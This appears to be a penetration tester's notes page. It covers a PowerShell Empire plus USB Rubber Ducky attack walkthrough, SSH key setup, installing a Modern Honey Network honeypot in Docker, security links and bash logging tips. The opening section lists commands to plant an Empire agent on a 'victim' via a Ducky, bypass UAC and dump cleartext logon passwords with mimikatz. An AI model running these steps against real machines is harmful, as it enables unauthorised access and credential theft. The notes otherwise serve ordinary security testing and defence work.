Empire + Ducky

1. Create listener 
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky 
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate inject.bin file from code in ducky.txt
at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4c. (Empire: agents) > interact FSDFSGAJ34FGH4
4d. (Empire: FSDFSGAJ34FGH4 ) > sysinfo
4e. (Empire: FSDFSGAJ34FGH4 ) > usemodule privesc/bypassuac
4f. (Empire: privesc/bypassuac ) > set Listener Listener01
4g. (Empire: privesc/bypassuac ) > run 
4h. (Empire: privesc/bypassuac ) > back * 2
4i. (Empire: agents) > list
4j. (Empire: agents) > interact DSGHFDFSGHJ243J
4k. (Empire: DSGHFDFSGHJ243J ) > usemodule credentials/
mimikatz/logonpasswords
4l. (Empire: credentials/mimikatz/logonpasswords ) > run

If succesful, logon passwords are now revealed in 
cleartext :)

SSH Authentication

  • Generate key pair

    • Linux: # ssh-keygen -t rsa
    • Putty: puttygen.exe
  • Load the private key in the PuTTY profile

  • Copy the public key to ~/.ssh/authorized_keys

  • Change permissions on folders

    • chmod 700 ~/.ssh
    • chmod 600 ~/.ssh/authorized_keys
  • Change owner on folder

    • Chown $USER:$USER ~/.ssh -R
  • Verify that folders aren’t group/world writeable

    • chmod go-w $HOME $HOME/.ssh $HOME/.ssh/authorized_keys
  • Edit sshd_config

    • # nano /etc/ssd_config
    • Make sure that a line says ‘AuthorizedKeysFile %h/.ssh/authorized_keys’
  • Restart SSH

    • # service ssh restart

Docker & MHN

Install docker

# apt-get install docker.io

Create & run Docker container for MHN

# docker run -p 10000:10000 -p 80:80 -p 3000:3000 -p 8089:8089 -p 8091:8091 --name mhnsrv --hostname=mhnsrv -t -i ubuntu:14.04 /bin/bash

Install & configure MHN server

#!/bin/bash

set -x

apt-get update 
apt-get upgrade -y 
apt-get install git wget gcc supervisor -y 
cd /opt/ 
git clone https://github.com/threatstream/mhn.git 
cd mhn

cat > /etc/supervisor/conf.d/mhntodocker.conf <<EOF
[program:mongod]
command=/usr/bin/mongod
stdout_logfile=/var/log/supervisor/%(program_name)s.log
stderr_logfile=/var/log/supervisor/%(program_name)s.log
autorestart=true
autostart=true

[program:nginx]
command=/usr/sbin/nginx
stdout_events_enabled=true
stderr_events_enabled=true
autostart=true
autorestart=true

EOF

mkdir -p /data/db /var/log/mhn /var/log/supervisor

supervisord &

#Starts the mongod service after installation
echo supervisorctl start mongod >> /opt/mhn/scripts/install_mongo.sh

./install.sh

supervisorctl restart all 

MHN Configuration

Do you wish to run in Debug mode?: y/n n
Superuser email: fname.lname@mail.com
Superuser password:
Superuser password: (again):
Server base url [“http://1.2.3.4”]: 127.0.0.1
Honeymap url [“127.0.0.1:3000”]:
Mail server address [“localhost”]:
Mail server port [25]:
Use TLS for email?: y/n n
Use SSL for email?: y/n n
Mail server username [“”]:
Mail server password [“”]:
Mail default sender [“”]:
Path for log file [“/var/log/mhn/mhn.log”]:

Create & run a MHN sensor docker container

Container w/ all ports published

# docker run --publish-all=true --name mhnsensor --hostname=mhnsensor -t -i ubuntu:14.04.02 /bin/bash

Container w/ specific ports published

# docker run -p 21:21 -p 2222:22 -p 23:23 -p 25:25 -p 8080:80 -p 110:110 -p 135:135 -p 139:139 -p 443:443 -p 445:445 -p 1433:1433 -p 3306:3306 -p 3389:3389 -p 5060:5060 -p 5061:5061 -p 5900:5900 -p 8081:8081 --name mhnsensor --hostname=mhnsensor -t -i ubuntu:14.04 /bin/bash

Install additional apps

# apt install wget python

Commands

# docker ps : show docker processes

# docker logs [container_id]: show docker logs

# docker inspect [container_id]: show docker details

# docker stats [container_id]: show docker stats

# docker port [container_id]: show docker port

# docker attach mhn : interact with mhn docker container

CTRL-p CTRL-q : detach from container & leave it running

# docker start [container_id] : start a container

# docker exec [container_id] supervisord & : start the mhn server container + supervisor app.

More info

Docker User guides

https://docs.docker.com/engine/userguide/

Security Links

Average Security Guys
http://averagesecurityguy.info/

Secure Planet

https://www.securepla.net/

http://www.securepla.net/wiki/index.php?title=Main_Page

MDSec.net

http://mdsec.net/wahh/tasks.html

DaftHack

http://www.dafthack.com/blog

CHRISTOPHER TRUNCER’S WEBSITE

https://www.christophertruncer.com/

LockBoxx

http://lockboxx.blogspot.se/

Kioptrix

http://www.kioptrix.com/

www.Ehacking.net(collection)

https://flipboard.com/@dimovey/ethical-hacking-oeci7t8uz

 

Linux tips :: Various

Custom prompt

$ export PS1=”[\d \t \u@\h:\w]$”

2015-10-28 09_35_45-caab@wrksedfsh_ ~

Logging #1

Use Putty to log commands. Can be handy for documentation

  • Change Settings… –> Session –> Logging
    • Session logging –> Printable output

PuTTY Reconfiguration

Logging #2

Turn on continuous logging

export PROMPT_COMMAND='if [ "$(id -u)" -ne 0 ]; then echo "$(date "+%Y-%m-%d.%H:%M:%S") $(pwd) $(history 1)" >> ~/.logs/bash-history-$(date "+%Y-%m-%d").log; fi'

 

Then, to find a specific command or text string is as easy as

# grep -h nmap ~/.logs/bash-history-2016-06*